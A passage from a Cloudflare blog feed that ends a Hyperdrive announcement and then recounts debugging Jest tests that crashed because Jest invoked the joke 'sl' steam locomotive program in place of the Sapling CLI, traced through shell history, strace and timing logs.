substantially reduces the network bandwidth Hyperdrive uses to serve these queries. A win-win!</p><p>In the scenarios where query results can’t be served from the cache in <code>Client</code>’s data center, all is still not lost. <code>Endpoint</code> may also have cached results for this query, because it can field traffic from many different <code>Client</code>s around the world. If so, it will provide these results back to <code>Client</code>, along with how much time is remaining before they expire, such that <code>Client</code> can both return them and store them correctly into its own cache. Likewise, if <code>Endpoint</code> does need to go to the origin database for results, they will be stored into both <code>Client</code> and <code>Endpoint</code> caches. This ensures that followup queries from that same <code>Client</code> data center will get the happy path with single-digit ms response times, and also reduce load on the origin database from any other <code>Client</code>’s queries. This functions similarly to how <a href="https://developers.cloudflare.com/cache/how-to/tiered-cache/"><u>Cloudflare's Tiered Cache</u></a> works, with <code>Endpoint</code>’s cache functioning as a final layer of shielding for the origin database.</p>
    <div>
      <h2>Come on in, the water’s fine!</h2>
      <a href="#come-on-in-the-waters-fine">
        
      </a>
    </div>
    <p>With this announcement of a Free Plan for Hyperdrive, and newly armed with the knowledge of how it works under the hood, we hope you’ll enjoy building your next project with it! You can get started with a single Wrangler command (or using the dashboard):</p>
            <pre><code>wrangler hyperdrive create postgres-hyperdrive 
--connection-string="postgres://user:password@db-host.example.com:5432/defaultdb"</code></pre>
            <p>We’ve also included a Deploy to Cloudflare button below to let you get started with a sample Worker app using Hyperdrive, just bring your existing Postgres database! If you have any questions or ideas for future improvements, please feel free to visit our <a href="https://discord.com/channels/595317990191398933/1150557986239021106"><u>Discord channel!</u></a></p><a href="https://deploy.workers.cloudflare.com/?url=https://github.com/cloudflare/templates/tree/main/postgres-hyperdrive-template"><img src="https://deploy.workers.cloudflare.com/button" /></a>
<p></p><p></p> ]]></content:encoded>
            <category><![CDATA[Developer Week]]></category>
            <category><![CDATA[Developer Platform]]></category>
            <category><![CDATA[Deep Dive]]></category>
            <category><![CDATA[Cloudflare Workers]]></category>
            <category><![CDATA[Hyperdrive]]></category>
            <category><![CDATA[Smart Placement]]></category>
            <category><![CDATA[SQL]]></category>
            <guid isPermaLink="false">3YedZXQKWaCm2jUQPvAeQv</guid>
            <dc:creator>Andrew Repp</dc:creator>
            <dc:creator>Matt Alonso</dc:creator>
        </item>
        <item>
            <title><![CDATA[A steam locomotive from 1993 broke my yarn test]]></title>
            <link>https://blog.cloudflare.com/yarn-test-suffers-strange-derailment/</link>
            <pubDate>Wed, 02 Apr 2025 13:00:00 GMT</pubDate>
            <description><![CDATA[ Yarn tests fail consistently at the 27-second mark. The usual suspects are swiftly eliminated. A deep dive is taken to comb through traces, only to be derailed into an unexpected crash investigation. ]]></description>
            <content:encoded><![CDATA[ <p>So the story begins with a pair programming session I had with my colleague, which I desperately needed because my node skill tree is still at level 1, and I needed to get started with React because I'll be working on our internal <a href="https://github.com/backstage/backstage"><u>backstage</u></a> instance.</p><p>We worked together on a small feature, tested it locally, and it worked. Great. Now it's time to make My Very First React Commit. So I ran the usual <code>git add</code> and <code>git commit</code>, which hooked into <code>yarn test</code>, to automatically run unit tests for backstage, and that's when <i>everything got derailed</i>. For all the React tutorials I have followed, I have never actually run a <code>yarn test</code> on <i>my machine</i>. And the first time I tried yarn test, it hung, and after a long time, the command eventually failed:</p>
            <pre><code>Determining test suites to run...

  ● Test suite failed to run

thrown: [Error]

error Command failed with exit code 1.
info Visit https://yarnpkg.com/en/docs/cli/run for documentation about this command.
🌈  backstage  ⚡</code></pre>
            <p>I could tell it was obviously unhappy about something, and then it threw some [Error]. I have very little actual JavaScript experience, but this looks suspiciously like someone had neglected to write a proper toString() or whatever, and thus we're stuck with the monumentally unhelpful [Error]. Searching the web yielded an entire ocean of false positives due to how vague the error message is. <i>What a train wreck!</i></p><p>Fine, let's put on our troubleshooting hats. My memory is not perfect, but thankfully shell history is. Let's see all the (ultimately useless) things that were tried (with commentary):</p>
            <pre><code>2025-03-19 14:18  yarn test --help                                                                                                  
2025-03-19 14:20  yarn test --verbose                    
2025-03-19 14:21  git diff --staged                                                                                                 
2025-03-19 14:25  vim README.md                    # Did I miss some setup?
2025-03-19 14:28  i3lock -c 336699                 # "I need a drink"            
2025-03-19 14:34  yarn test --debug                # Debug, verbose, what's the diff
2025-03-19 14:35  yarn backstage-cli repo test     # Maybe if I invoke it directly ...
2025-03-19 14:36  yarn backstage-cli --version     # Nope, same as mengnan's
2025-03-19 14:36  yarn backstage-cli repo --help
2025-03-19 14:36  yarn backstage-cli repo test --since HEAD~1   # Minimal changes?
2025-03-19 14:36  yarn backstage-cli repo test --since HEAD     # Uhh idk no changes???
2025-03-19 14:38  yarn backstage-cli repo test plugins          # The first breakthrough. More on this later
2025-03-19 14:39  n all tests.\n › Press f to run only failed tests.\n › Press o to only run tests related to changed files.\n › Pres
filter by a filename regex pattern.\n › Press t to filter by a test name regex pattern.\n › Press q to quit watch mode.\n › Press Ent
rigger a test run all tests.\n › Press f to run only failed tests.\n › Press o to only run tests related to changed files.\n › Press
lter by a filename regex pattern.\n › Press t to filter by a test name regex pattern.\n › Press q to quit watch mode.\n › Press Enter
gger a test ru                                     # Got too excited and pasted rubbish
2025-03-19 14:44  ls -a | fgrep log
2025-03-19 14:44  find | fgrep log                 # Maybe it leaves a log file?
2025-03-19 14:46  yarn backstage-cli repo test --verbose --debug --no-cache plugins    # "clear cache"
2025-03-19 14:52  yarn backstage-cli repo test --no-cache --runInBand .                # No parallel
2025-03-19 15:00  yarn backstage-cli repo test --jest-help
2025-03-19 15:03  yarn backstage-cli repo test --resetMocks --resetModules plugins     # I have no idea what I'm resetting</code></pre>
            <p>The first real breakthrough was <code>test plugins</code>, which runs only tests matching "plugins". This effectively bypassed the "determining suites to run..." logic, which was the thing that was hanging. So, I am now able to get tests to run. However, these too eventually crash with the same cryptic <code>[Error]</code>:</p>
            <pre><code>PASS   @cloudflare/backstage-components  plugins/backstage-components/src/components/Cards/TeamMembersListCard/TeamMembersListCard.test.tsx (6.787 s)
PASS   @cloudflare/backstage-components  plugins/backstage-components/src/components/Cards/ClusterDependencyCard/ClusterDependencyCard.test.tsx
PASS   @internal/plugin-software-excellence-dashboard  plugins/software-excellence-dashboard/src/components/AppDetail/AppDetail.test.tsx
PASS   @cloudflare/backstage-entities  plugins/backstage-entities/src/AccessLinkPolicy.test.ts


  ● Test suite failed to run

thrown: [Error]</code></pre>
            <p>Re-running it or matching different tests will give slightly different run logs, but they always end with the same error.</p><p>By now, I've figured out that yarn test is actually backed by <a href="https://jestjs.io/"><u>Jest, a JavaScript testing framework</u></a>, so my next strategy is simply trying different Jest flags to see what sticks, but invariably, none do:</p>
            <pre><code>2025-03-19 15:16  time yarn test --detectOpenHandles plugins
2025-03-19 15:18  time yarn test --runInBand .
2025-03-19 15:19  time yarn test --detectLeaks .
2025-03-19 15:20  yarn test --debug aetsnuheosnuhoe
2025-03-19 15:21  yarn test --debug --no-watchman nonexisis
2025-03-19 15:21  yarn test --jest-help
2025-03-19 15:22  yarn test --debug --no-watch ooooooo &gt; ~/jest.config
</code></pre>
            
    <div>
      <h2>A pattern finally emerges</h2>
      <a href="#a-pattern-finally-emerges">
        
      </a>
    </div>
    <p>Eventually, after re-running it so many times, I started to notice a pattern. So by default after a test run, Jest drops you into an interactive menu where you can  (Q)uit, Run (A)ll tests, etc. and I realized that Jest would eventually crash, even if it's idling in the menu. I started timing the runs, which led me to the second breakthrough:</p>
            <pre><code>› Press q to quit watch mode.
 › Press Enter to trigger a test run.


  ● Test suite failed to run

thrown: [Error]

error Command failed with exit code 1.
info Visit https://yarnpkg.com/en/docs/cli/run for documentation about this command.
yarn test .  109.96s user 14.21s system 459% cpu 27.030 total</code></pre>
            
            <pre><code>RUNS   @cloudflare/backstage-components  plugins/backstage-components/src/components/Cards/TeamRoles/CustomerSuccessCard.test.tsx
 RUNS   @cloudflare/backstage-app  packages/app/src/components/catalog/EntityFipsPicker/EntityFipsPicker.test.tsx

Test Suites: 2 failed, 23 passed, 25 of 65 total
Tests:       217 passed, 217 total
Snapshots:   0 total
error Command failed with exit code 1.
info Visit https://yarnpkg.com/en/docs/cli/run for documentation about this command.
yarn test .  110.85s user 14.04s system 463% cpu 26.974 total</code></pre>
            <p>No matter what Jest was doing, it always crashes after almost exactly 27 wallclock seconds. It literally didn't matter what tests I selected or re-ran. Even the original problem, a bare yarn test (no tests selected, just hangs), will crash after 27 seconds:</p>
            <pre><code>Determining test suites to run...

  ● Test suite failed to run

thrown: [Error]

error Command failed with exit code 1.
info Visit https://yarnpkg.com/en/docs/cli/run for documentation about this command.
yarn test  2.05s user 0.71s system 10% cpu 27.094 total
</code></pre>
            <p>Obviously, some sort of timeout. 27 seconds is kind of a weird number (unlike, say, 5 seconds or 60 seconds) but let's try:</p>
            <pre><code>2025-03-19 15:09  find | fgrep 27
2025-03-19 15:09  git grep '\b27\b'
</code></pre>
            <p>No decent hits.</p><p>How about something like 20+7 or even 20+5+2? <i>Nope.</i></p><p>Googling/GPT-4oing  for "jest timeout 27 seconds" again yielded nothing useful. Far more people were having problems with testing asynchronously, or getting their tests to timeout, than with Jest proper. </p><p>At this time, my colleague came back from his call, and with his help we determined some other things:</p><ul><li><p>his system (MacOS) is not affected at all versus mine (Linux)</p></li><li><p><a href="https://github.com/nvm-sh/nvm?tab=readme-ov-file#intro"><u>nvm use v20</u></a> didn't fix it</p></li><li><p>I can reproduce it on a clean clone of <a href="https://github.com/backstage/backstage"><u>github.com/backstage/backstage</u></a>. The tests seem to progress further, about 50+ seconds. This lends credence to a running theory that the filesystem crawler/watcher is the one crashing, and backstage/backstage is a bigger repo than the internal Cloudflare instance, so it takes longer.</p></li></ul><p>I next went <i>on a little detour</i> to grab another colleague who I know has been working on a <a href="https://nextjs.org/"><u>Next.js</u></a> project. He's one of the few other people nearby who knows anything about <a href="https://nodejs.org/en"><u>Node.js</u></a>. In my experience with troubleshooting it’s helpful to get multiple perspectives, so we can cover each other’s blind spots and avoid tunnel vision.</p><p>I then tried invoking many yarn tests in parallel, and I did manage to get the crash time to stretch out to 28 or 29 seconds if the system was under heavy load. So this tells me that it might not be a hard timeout but rather processing driven. A series of sleeps <i>chugging along</i> perhaps?</p><p>By now, there is a veritable crowd of curious onlookers gathered in front of my terminal marveling at the consistent 27 seconds crash and trading theories. At some point, someone asked if I had tried rebooting yet, and I had to sheepishly reply that I haven't but "I'm absolutely sure it wouldn't help whatsoever".</p><p>And the astute reader can already guess that rebooting did nothing at all, or else this wouldn't even be a story worth telling. Besides, haven't I teased in the clickbaity title about some crazy Steam Locomotive from 1993?</p>
    <div>
      <h2>Strace to the rescue</h2>
      <a href="#strace-to-the-rescue">
        
      </a>
    </div>
    <p>My colleague then put us <i>back on track</i> and suggested <a href="https://strace.io/"><u>strace</u></a>, and I decided to trace the simpler case of the idling menu (rather than trace running tests, which generated far more syscalls).</p>
            <pre><code>Watch Usage
 › Press a to run all tests.
 › Press f to run only failed tests.
 › Press o to only run tests related to changed files.
 › Press p to filter by a filename regex pattern.
 › Press t to filter by a test name regex pattern.
 › Press q to quit watch mode.
 › Press Enter to trigger a test run.
[], 1024, 1000)          = 0
openat(AT_FDCWD, "/proc/self/stat", O_RDONLY) = 21
read(21, "42375 (node) R 42372 42372 11692"..., 1023) = 301
close(21)                               = 0
epoll_wait(13, [], 1024, 0)             = 0
epoll_wait(13, [], 1024, 999)           = 0
openat(AT_FDCWD, "/proc/self/stat", O_RDONLY) = 21
read(21, "42375 (node) R 42372 42372 11692"..., 1023) = 301
close(21)                               = 0
epoll_wait(13, [], 1024, 0)             = 0
epoll_wait(13,</code></pre>
            <p>It basically <code>epoll_waits</code> until 27 seconds are up and then, right when the crash happens:</p>
            <pre><code> ● Test suite failed to run                                                                                                                
                                                                                                                                            
thrown: [Error]                                                                                                                             
                                                                                                                                            
0x7ffd7137d5e0, 1024, 1000) = -1 EINTR (Interrupted system call)
--- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=42578, si_uid=1000, si_status=1, si_utime=0, si_stime=0} ---
read(4, "*", 1)                     	= 1
write(15, "\210\352!\5\0\0\0\0\21\0\0\0\0\0\0\0", 16) = 16
write(5, "*", 1)                    	= 1
rt_sigreturn({mask=[]})             	= -1 EINTR (Interrupted system call)
epoll_wait(13, [{events=EPOLLIN, data={u32=14, u64=14}}], 1024, 101) = 1
read(14, "\210\352!\5\0\0\0\0\21\0\0\0\0\0\0\0", 512) = 16
wait4(42578, [{WIFEXITED(s) &amp;&amp; WEXITSTATUS(s) == 1}], WNOHANG, NULL) = 42578
rt_sigprocmask(SIG_SETMASK, ~[RTMIN RT_1], [], 8) = 0
read(4, "*", 1)                     	= 1
rt_sigaction(SIGCHLD, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x79e91e045330}, NULL, 8) = 0
write(5, "*", 1)                    	= 1
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
mmap(0x34ecad880000, 1495040, PROT_NONE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_NORESERVE, -1, 0) = 0x34ecad880000
madvise(0x34ecad880000, 1495040, MADV_DONTFORK) = 0
munmap(0x34ecad9ae000, 258048)      	= 0
mprotect(0x34ecad880000, 1236992, PROT_READ|PROT_WRITE) = 0</code></pre>
            <p>I don't know about you, but sometimes I look at straces and wonder “Do people actually read this gibberish?” Fortunately, in the modern generative AI era, we can count on GPT-4o to gently chide: the process was interrupted <code>EINTR</code> by its child <code>SIGCHLD</code>, which means you forgot about the children, silly human. Is the problem with <i>one of the cars rather than the engine</i>?</p><p>Following this <i>train of thought</i>, I now re-ran with <code>strace --follow-forks</code>, which revealed a giant flurry of activity that promptly overflowed my terminal buffer. The investigation is really <i>gaining steam</i> now. The original trace weighs in at a hefty 500,000 lines, but here is a smaller equivalent version derived from a clean instance of backstage: <a href="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3IX3GEpe1WPllLf4tJBw5l/9a6c00a3eb06693d545ca49834ded987/trace.log.gz"><u>trace.log.gz</u></a>. I have uploaded this trace here because the by-now overhyped Steam Locomotive is finally making its grand appearance<b> </b>and I know there'll be people who'd love nothing more than to crawl through a haystack of system calls looking for a train-sized needle. Consider yourself lucky, I had to do it without even knowing what I was looking for, much less that it was a whole Steam Locomotive.</p><hr /><p>This section is left intentionally blank to allow locomotive enthusiasts who want to find the train on their own to do so first.</p><hr /><p>Remember my comment about straces being gibberish? Actually, I was kidding. So there are a few ways to make it more manageable, and with experience you'll learn which system calls to pay attention to, such as <code>execve</code>,<code> chdir</code>,<code> open</code>,<code> read</code>,<code> fork</code>,<code> and signals</code>, and which ones to skim over, such as <code>mprotect,</code> <code>mmap</code>, and <code>futex</code>.</p><p>Since I'm writing this account after the fact, let's cheat a little and assume I was super smart and zeroed in on execve correctly on the first try:</p>
            <pre><code>🌈  ~  zgrep execve trace.log.gz | head
execve("/home/yew/.nvm/versions/node/v18.20.6/bin/yarn", ["yarn", "test", "steam-regulator"], 0x7ffdff573148 /* 72 vars */) = 0
execve("/home/yew/.pyenv/shims/node", ["node", "/home/yew/.nvm/versions/node/v18"..., "test", "steam-regulator"], 0x7ffd64f878c8 /* 72 vars */) = -1 ENOENT (No such file or directory)
execve("/home/yew/.pyenv/bin/node", ["node", "/home/yew/.nvm/versions/node/v18"..., "test", "steam-regulator"], 0x7ffd64f878c8 /* 72 vars */) = -1 ENOENT (No such file or directory)
execve("/home/yew/repos/secrets/bin/node", ["node", "/home/yew/.nvm/versions/node/v18"..., "test", "steam-regulator"], 0x7ffd64f878c8 /* 72 vars */) = -1 ENOENT (No such file or directory)
execve("/home/yew/.nvm/versions/node/v18.20.6/bin/node", ["node", "/home/yew/.nvm/versions/node/v18"..., "test", "steam-regulator"], 0x7ffd64f878c8 /* 72 vars */) = 0
[pid 49307] execve("/bin/sh", ["/bin/sh", "-c", "backstage-cli repo test resource"...], 0x3d17d6d0 /* 156 vars */ &lt;unfinished ...&gt;
[pid 49307] &lt;... execve resumed&gt;)   	= 0
[pid 49308] execve("/home/yew/cloudflare/repos/backstage/node_modules/.bin/backstage-cli", ["backstage-cli", "repo", "test", "steam-regulator"], 0x5e7ef80051d8 /* 156 vars */ &lt;unfinished ...&gt;
[pid 49308] &lt;... execve resumed&gt;)   	= 0
[pid 49308] execve("/tmp/yarn--1742459197616-0.9027914591640542/node", ["node", "/home/yew/cloudflare/repos/backs"..., "repo", "test", "steam-regulator"], 0x7ffcc18af270 /* 156 vars */) = 0
🌈  ~  zgrep execve trace.log.gz | wc -l
2254
</code></pre>
            <p>Phew, 2,000 is a lot of <code>execves</code> . Let's get the unique ones, plus their counts:</p>
            <pre><code>🌈  ~  zgrep -oP '(?&lt;=execve\(")[^"]+' trace.log.gz | xargs -L1 basename | sort | uniq -c | sort -nr
    576 watchman
    576 hg
    368 sl
    358 git
     16 sl.actual
     14 node
      2 sh
      1 yarn
      1 backstage-cli</code></pre>
            <p>Have you spotted the <b>S</b>team <b>L</b>ocomotive yet? I spotted it immediately because this is My Own System and Surely This Means I Am Perfectly Aware Of Everything That Is Installed Unlike, er, <code>node_modules</code>.</p><p><code>sl</code>  is actually a<a href="https://github.com/mtoyoda/sl"> <u>fun little joke program from 1993</u></a> that plays on users' tendencies to make a typo on <a href="https://man7.org/linux/man-pages/man1/ls.1.html"><code><u>ls</u></code></a>. When <code>sl</code>  runs, it clears your terminal to make way for an animated steam locomotive to come chugging through.</p>
            <pre><code>                        (  ) (@@) ( )  (@)  ()	@@	O 	@ 	O 	@  	O
                   (@@@)
               (	)
            (@@@@)
 
          (   )
      ====    	________            	___________
  _D _|  |_______/    	\__I_I_____===__|_________|
   |(_)---  |   H\________/ |   |    	=|___ ___|  	_________________
   / 	|  |   H  |  | 	|   |     	||_| |_|| 	_|            	\_____A
  |  	|  |   H  |__--------------------| [___] |   =|                    	|
  | ________|___H__/__|_____/[][]~\_______|   	|   -|                    	|
  |/ |   |-----------I_____I [][] []  D   |=======|____|________________________|_
__/ =| o |=-~~\  /~~\  /~~\  /~~\ ____Y___________|__|__________________________|_
 |/-=|___|=O=====O=====O=====O   |_____/~\___/      	|_D__D__D_|  |_D__D__D_|
  \_/  	\__/  \__/  \__/  \__/  	\_/           	\_/   \_/	\_/   \_/</code></pre>
            <div>
  
</div><p>When I first saw that Jest was running <code>sl</code> so many times, my first thought was to ask my colleague if <code>sl</code> is a valid command on his Mac, and of course it is not. After all, which serious engineer would stuff their machine full of silly commands like <code>sl</code>, <a href="https://r-wos.org/hacks/gti"><code><u>gti</u></code></a>, <a href="https://en.wikipedia.org/wiki/Cowsay"><code><u>cowsay</u></code></a>, or <a href="https://linuxcommandlibrary.com/man/toilet"><code><u>toilet</u></code></a> ? The next thing I tried was to rename <code>sl</code> to something else, and sure enough all my problems disappeared: <code>yarn test</code> started working perfectly.</p>
    <div>
      <h2>So what does Jest have to do with Steam Locomotives?</h2>
      <a href="#so-what-does-jest-have-to-do-with-steam-locomotives">
        
      </a>
    </div>
    <p><a href="https://github.com/jestjs/jest/issues/14046"><u>Nothing, that's what</u></a>. The whole affair is an unfortunate naming clash between <code>sl</code> the Steam Locomotive and <code>sl</code> the<a href="https://github.com/facebook/sapling?tab=readme-ov-file#sapling-cli"> <u>Sapling CLI</u></a>. Jest wanted <code>sl</code> the source control system, but ended up getting steam-rolled by <code>sl </code>the Steam Locomotive.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6BDDm4dEbvMuVyn1J5reqf/ac7f914b3b23608941c84a6cd7aadbb1/image3.png" />
          </figure><p>Fortunately the devs took it in good humor, and<a href="https://github.com/jestjs/jest/pull/15053"> <u>made a (still unreleased) fix</u></a>. Check out the train memes!</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/n8MrPDXuVMuze7UEkxCie/5d187401c8bb12d8e3e0ef89d03b87f3/image4.png" />
          </figure>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/Fot6dhfCsL0zvxYkVEh6a/440436342f93d1f7aca7dd70a9059436/image2.png" />
          </figure><p>At this point the main story has ended. However, there are still some unresolved nagging questions, like...</p>
    <div>
      <h2>How did the crash arrive at the magic number of a relatively even 27 seconds?</h2>
      <a href="#how-did-the-crash-arrive-at-the-magic-number-of-a-relatively-even-27-seconds">
        
      </a>
    </div>
    <p>I don't know. Actually I'm not sure if a forked child executing <code>sl</code> still has a terminal anymore, but the travel time of the train does depend on the terminal width. The wider it is, the longer it takes:</p>
            <pre><code>🌈  ~  tput cols
425
🌈  ~  time sl
sl  0.19s user 0.06s system 1% cpu 20.629 total
🌈  ~  tput cols
58
🌈  ~  time sl  
sl  0.03s user 0.01s system 0% cpu 5.695 total</code></pre>
            <p>So the first thing I tried was to run yarn test in a ridiculously narrow terminal and see what happens:</p>
            <pre><code>Determin
ing test
 suites 
to run..
.       
        
  ● Test
 suite f
ailed to
 run    
        
thrown: 
[Error] 
        
error Co
mmand fa
iled wit
h exit c
ode 1.  
info Vis
it https
://yarnp
kg.com/e
n/docs/c
li/run f
or docum
entation
 about t
his comm
and.    
yarn tes
t  1.92s
 user 0.
67s syst
em 9% cp
u 27.088
 total  
🌈  back
stage [m
aster] t
put cols
        
8</code></pre>
            <p>Alas, the terminal width doesn't affect jest at all. Jest calls<a href="https://github.com/jestjs/jest/pull/13941/files#diff-4c649a2515ae8d1dc1ed6ebccbe3b43e54e5d7217cb011df616dcf471a80319cR59"> <code><u>sl via execa</u></code></a> so let's mock that up locally:</p>
            <pre><code>🌈  choochoo  cat runSl.mjs 
import {execa} from 'execa';
const { stdout } = await execa('tput', ['cols']);
console.log('terminal colwidth:', stdout);
await execa('sl', ['root']);
🌈  choochoo  time node runSl.mjs
terminal colwidth: 80
node runSl.mjs  0.21s user 0.06s system 4% cpu 6.730 total</code></pre>
            <p>So <code>execa</code> uses the default terminal width of 80, which takes the train 6.7 seconds to cross. And 27 seconds divided by 6.7 is awfully close to 4. So is Jest running <code>sl</code> 4 times? Let's do a poor man's <a href="https://github.com/bpftrace/bpftrace"><u>bpftrace</u></a> by hooking into <code>sl</code> like so:</p>
            <pre><code>#!/bin/bash

uniqid=$RANDOM
echo "$(date --utc +"%Y-%m-%d %H:%M:%S.%N") $uniqid started" &gt;&gt; /home/yew/executed.log
/usr/games/sl.actual "$@"
echo "$(date --utc +"%Y-%m-%d %H:%M:%S.%N") $uniqid ended" &gt;&gt; /home/yew/executed.log</code></pre>
            <p>And if we check <code>executed.log</code>, <code>sl</code> is indeed executed in 4 waves, albeit by 5 workers simultaneously in each wave:</p>
            <pre><code>#wave1
2025-03-20 13:23:57.125482563 21049 started
2025-03-20 13:23:57.127526987 21666 started
2025-03-20 13:23:57.131099388 4897 started
2025-03-20 13:23:57.134237754 102 started
2025-03-20 13:23:57.137091737 15733 started
#wave1 ends, wave2 starts
2025-03-20 13:24:03.704588580 21666 ended
2025-03-20 13:24:03.704621737 21049 ended
2025-03-20 13:24:03.707780748 4897 ended
2025-03-20 13:24:03.712086346 15733 ended
2025-03-20 13:24:03.711953000 102 ended
2025-03-20 13:24:03.714831149 18018 started
2025-03-20 13:24:03.721293279 23293 started
2025-03-20 13:24:03.724600164 27918 started
2025-03-20 13:24:03.729763900 15091 started
2025-03-20 13:24:03.733176122 18473 started
#wave2 ends, wave3 starts
2025-03-20 13:24:10.294286746 18018 ended
2025-03-20 13:24:10.297261754 23293 ended
2025-03-20 13:24:10.300925031 27918 ended
2025-03-20 13:24:10.300950334 15091 ended
2025-03-20 13:24:10.303498710 24873 started
2025-03-20 13:24:10.303980494 18473 ended
2025-03-20 13:24:10.308560194 31825 started
2025-03-20 13:24:10.310595182 18452 started
2025-03-20 13:24:10.314222848 16121 started
2025-03-20 13:24:10.317875812 30892 started
#wave3 ends, wave4 starts
2025-03-20 13:24:16.883609316 24873 ended
2025-03-20 13:24:16.886708598 18452 ended
2025-03-20 13:24:16.886867725 31825 ended
2025-03-20 13:24:16.890735338 16121 ended
2025-03-20 13:24:16.893661911 21975 started
2025-03-20 13:24:16.898525968 30892 ended
#crash imminent! wave4 ending, wave5 starting...
2025-03-20 13:24:23.474925807 21975 ended</code></pre>
            <p>The logs were emitted for about 26.35 seconds, which is close to 27. It probably crashed just as wave4 was reporting back. And each wave lasts about 6.7 seconds, right on the money with manual measurement. </p>
    <div>
      <h2>So why is Jest running sl in 4 waves? Why did it crash at the start of the 5th wave?</h2>
      <a href="#so-why-is-jest-running-sl-in-4-waves-why-did-it-crash-at-the-start-of-the-5th-wave">
        
      </a>
    </div>
    <p>Let's again modify the poor man's bpftrace to also log the args and working directory:</p>
            <pre><code>echo "$(date --utc +"%Y-%m-%d %H:%M:%S.%N") $uniqid started: $@ at $PWD" &gt;&gt; /home/yew/executed.log</code></pre>
            <p>From the results we can see that the 5 workers are busy executing <code>sl root</code>, which corresponds to the <code>getRoot()</code>  function in <code>jest-change-files/sl.ts</code> </p>
            <pre><code>2025-03-21 05:50:22.663263304  started: root at /home/yew/cloudflare/repos/backstage/packages/app/src
2025-03-21 05:50:22.665550470  started: root at /home/yew/cloudflare/repos/backstage/packages/backend/src
2025-03-21 05:50:22.667988509  started: root at /home/yew/cloudflare/repos/backstage/plugins/access/src
2025-03-21 05:50:22.671781519  started: root at /home/yew/cloudflare/repos/backstage/plugins/backstage-components/src
2025-03-21 05:50:22.673690514  started: root at /home/yew/cloudflare/repos/backstage/plugins/backstage-entities/src
2025-03-21 05:50:29.247573899  started: root at /home/yew/cloudflare/repos/backstage/plugins/catalog-types-common/src
2025-03-21 05:50:29.251173536  started: root at /home/yew/cloudflare/repos/backstage/plugins/cross-connects/src
2025-03-21 05:50:29.255263605  started: root at /home/yew/cloudflare/repos/backstage/plugins/cross-connects-backend/src
2025-03-21 05:50:29.257293780  started: root at /home/yew/cloudflare/repos/backstage/plugins/pingboard-backend/src
2025-03-21 05:50:29.260285783  started: root at /home/yew/cloudflare/repos/backstage/plugins/resource-insights/src
2025-03-21 05:50:35.823374079  started: root at /home/yew/cloudflare/repos/backstage/plugins/scaffolder-backend-module-gaia/src
2025-03-21 05:50:35.825418386  started: root at /home/yew/cloudflare/repos/backstage/plugins/scaffolder-backend-module-r2/src
2025-03-21 05:50:35.829963172  started: root at /home/yew/cloudflare/repos/backstage/plugins/security-scorecard-dash/src
2025-03-21 05:50:35.832597778  started: root at /home/yew/cloudflare/repos/backstage/plugins/slo-directory/src
2025-03-21 05:50:35.834631869  started: root at /home/yew/cloudflare/repos/backstage/plugins/software-excellence-dashboard/src
2025-03-21 05:50:42.404063080  started: root at /home/yew/cloudflare/repos/backstage/plugins/teamcity/src</code></pre>
            <p>The 16 entries here correspond neatly to the 16 <code>rootDirs</code> configured in Jest for Cloudflare's backstage. We have 5 trains, and we want to visit 16 stations so let's do some simple math. 16/5.0 = 3.2 which means our trains need to go back and forth 4 times at a minimum to cover them all.</p>
    <div>
      <h2>Final mystery: Why did it crash?</h2>
      <a href="#final-mystery-why-did-it-crash">
        
      </a>
    </div>
    <p>Let's go back to the very start of our journey. The original <code>[Error]</code> thrown was actually<a href="https://github.com/jestjs/jest/pull/13941/files#diff-4c649a2515ae8d1dc1ed6ebccbe3b43e54e5d7217cb011df616dcf471a80319cR48"> <u>from here</u></a> and after modifying <code>node_modules/jest-changed-files/index.js</code>, I found that the error is <code>shortMessage: 'Command failed with ENAMETOOLONG: sl status...</code>'  and the reason why became clear when I interrogated Jest about what it thinks the repos are.</p><p>While the git repo is what you'd expect, the sl "repo" looks amazingly like a <i>train wreck in motion</i>:</p>
            <pre><code>got repos.git as Set(1) { '/home/yew/cloudflare/repos/backstage' }
got repos.sl as Set(1) {
  '\x1B[?1049h\x1B[1;24r\x1B[m\x1B(B\x1B[4l\x1B[?7h\x1B[?25l\x1B[H\x1B[2J\x1B[15;80H_\x1B[15;79H_\x1B[16d|\x1B[9;80H_\x1B[12;80H|\x1B[13;80H|\x1B[14;80H|\x1B[15;78H__/\x1B[16;79H|/\x1B[17;80H\\\x1B[9;
  79H_D\x1B[10;80H|\x1B[11;80H/\x1B[12;79H|\x1B[K\x1B[13d\b|\x1B[K\x1B[14d\b|/\x1B[15;1H\x1B[1P\x1B[16;78H|/-\x1B[17;79H\\_\x1B[9;1H\x1B[1P\x1B[10;79H|(\x1B[11;79H/\x1B[K\x1B[12d\b\b|\x1B[K\x1B[13d\b|
  _\x1B[14;1H\x1B[1P\x1B[15;76H__/ =\x1B[16;77H|/-=\x1B[17;78H\\_/\x1B[9;77H_D _\x1B[10;78H|(_\x1B[11;78H/\x1B[K\x1B[12d\b\b|\x1B[K\x1B[13d\b| _\x1B[14;77H|/ |\x1B[15;75H__/
  =|\x1B[16;76H|/-=|\x1B[17;1H\x1B[1P\x1B[8;80H=\x1B[9;76H_D _|\x1B[10;77H|(_)\x1B[11;77H/\x1B[K\x1B[12d\b\b|\x1B[K\x1B[13d\b|
  _\r\x1B[14d\x1B[1P\x1B[15d\x1B[1P\x1B[16;75H|/-=|_\x1B[17;1H\x1B[1P\x1B[8;79H=\r\x1B[9d\x1B[1P\x1B[10;76H|(_)-\x1B[11;76H/\x1B[K\x1B[12d\b\b|\x1B[K\x1B[13d\b| _\r\x1B[14d\x1B[1P\x1B[15;73H__/ =|
  o\x1B[16;74H|/-=|_\r\x1B[17d\x1B[1P\x1B[8;78H=\r\x1B[9d\x1B[1P\x1B[10;75H|(_)-\x1B[11;75H/\x1B[K\x1B[12d\b\b|\x1B[K\x1B[13d\b|
